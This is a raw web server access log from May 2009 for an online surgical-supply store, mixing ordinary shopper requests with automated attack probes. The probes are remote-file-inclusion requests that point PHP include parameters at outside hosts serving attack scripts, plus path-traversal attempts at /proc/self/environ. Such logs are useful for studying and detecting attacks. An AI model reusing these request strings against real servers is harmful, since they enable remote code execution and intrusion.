221.251.28.84 - - [20/May/2009:05:49:42 -0400] "GET /images/bt_cal-a.gif HTTP/1.1" 200 504 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000505424121E100A1ED063+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; YJSG3)"
221.251.28.84 - - [20/May/2009:05:49:42 -0400] "GET /images/MCARD.GIF HTTP/1.1" 200 2789 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000505424121E100A1ED063+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; YJSG3)"
221.251.28.84 - - [20/May/2009:05:49:42 -0400] "GET /images/VISA.GIF HTTP/1.1" 200 2800 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000505424121E100A1ED063+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; YJSG3)"
221.251.28.84 - - [20/May/2009:05:49:42 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000505424121E100A1ED063+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; YJSG3)"
221.251.28.84 - - [20/May/2009:05:49:43 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; YJSG3)"
85.214.145.133 - - [20/May/2009:05:49:49 -0400] "GET /logs/access_log.Q108091400%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
221.251.28.84 - - [20/May/2009:05:49:53 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0005054B4A414100CCED063+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; YJSG3)"
221.251.28.84 - - [20/May/2009:05:49:50 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0005054B4A414100CCED063+M37+ENG HTTP/1.1" 200 76114 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000505424121E100A1ED063+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; YJSG3)"
65.23.158.226 - - [20/May/2009:05:50:25 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:05:50:25 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:05:50:25 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:05:50:25 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:05:50:25 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:05:50:25 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:05:50:41 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:05:50:42 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.217.216.86 - - [20/May/2009:05:50:49 -0400] "GET /logs/access_log.Q108090200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sherif-dudulz.ucoz.com/osiris.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.826"
124.217.216.86 - - [20/May/2009:05:50:49 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sherif-dudulz.ucoz.com/osiris.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.826"
124.217.216.86 - - [20/May/2009:05:50:49 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sherif-dudulz.ucoz.com/osiris.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.826"
172.16.1.157 - - [20/May/2009:05:50:56 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:05:50:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:05:50:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
124.217.216.86 - - [20/May/2009:05:50:59 -0400] "GET /logs/access_log.Q108082500/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sherif-dudulz.ucoz.com/osiris.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.826"
222.122.26.5 - - [20/May/2009:05:51:06 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.122.26.5 - - [20/May/2009:05:51:07 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
119.73.33.192 - - [20/May/2009:05:51:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
119.73.33.192 - - [20/May/2009:05:51:09 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
119.73.33.192 - - [20/May/2009:05:51:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
119.73.33.192 - - [20/May/2009:05:51:11 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.23.158.226 - - [20/May/2009:05:51:17 -0400] "GET /logs/access_log.Q109011400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:05:51:18 -0400] "GET /logs/access_log.Q109011400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.1.64.133 - - [20/May/2009:05:51:18 -0400] "GET /logs/access_log.Q108052400//popup_window.php?site_isp_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
218.1.64.133 - - [20/May/2009:05:51:19 -0400] "GET /logs/access_log.Q108052400/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.1.64.133 - - [20/May/2009:05:51:19 -0400] "GET /logs/access_log.Q108052400//popup_window.php?site_isp_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 242 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:05:51:20 -0400] "GET /logs/access_log.Q108052400//popup_window.php?site_isp_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 242 "-" "XXXXXX"
216.119.103.12 - - [20/May/2009:05:51:56 -0400] "GET /logs/access_log.Q108111700//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:05:51:56 -0400] "GET //?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:05:51:56 -0400] "GET /logs//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2093 "-" "libwww-perl/5.805"
118.8.45.150 - - [20/May/2009:05:52:03 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS%20(S0040):0 HTTP/1.1" 200 69450 "http://www.acesurgical.com/allooss_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:06 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:07 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:07 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:07 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:07 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:08 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:08 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:08 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:09 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:09 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:09 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:09 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:10 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:10 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:10 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:10 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:11 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:11 -0400] "GET /images/items/ALLOOSS2_THUMB.JPG HTTP/1.1" 200 2001 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:11 -0400] "GET /images/items/ALLOOSS1_THUMB.JPG HTTP/1.1" 200 30054 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:12 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:12 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:13 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:13 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:13 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:13 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:15 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:15 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:15 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:15 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:16 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:52:16 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
172.16.1.157 - - [20/May/2009:05:52:46 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:05:52:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:05:52:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
208.64.202.134 - - [20/May/2009:05:53:09 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:05:53:09 -0400] "GET /logs/error_log.Q107120800 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.175.180.194 - - [20/May/2009:05:53:09 -0400] "GET //update/update5.php?lang=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:05:53:09 -0400] "GET /logs//update/update5.php?lang=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:05:53:09 -0400] "GET /logs/error_log.Q108032500%20%20//update/update5.php?lang=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:05:53:09 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.8.45.150 - - [20/May/2009:05:53:10 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.175.180.194 - - [20/May/2009:05:53:11 -0400] "GET //update/update5.php?lang=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:05:53:11 -0400] "GET /logs//update/update5.php?lang=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:05:53:11 -0400] "GET /logs/error_log.Q108032500%20%20//update/update5.php?lang=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.8.45.150 - - [20/May/2009:05:53:12 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:12 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:18 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:18 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.59.12.99 - - [20/May/2009:05:53:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.64.202.134 - - [20/May/2009:05:53:31 -0400] "GET /logs/access_log.Q109011400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:05:53:33 -0400] "GET /logs/access_log.Q109011400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
